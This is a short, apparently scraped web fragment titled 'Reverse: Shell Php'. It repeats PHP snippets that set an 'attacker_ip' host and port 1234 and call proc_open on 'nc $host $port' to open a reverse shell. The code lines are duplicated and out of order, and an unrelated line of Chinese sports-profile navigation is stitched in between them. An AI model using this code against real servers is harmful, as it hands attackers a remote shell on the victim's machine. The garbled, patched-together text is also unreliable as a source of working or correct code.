Reverse: Shell Php

Reverse: Shell Php

$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") );

<?php $host = 'attacker_ip'; $port = 1234;

$process = proc_open("nc $host $port", $descriptorspec, $pipes);

基本资料  个人档案  比赛(985)  图片(25)  视频(7)  资讯(22) 

$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") );

<?php $host = 'attacker_ip'; $port = 1234;

$process = proc_open("nc $host $port", $descriptorspec, $pipes);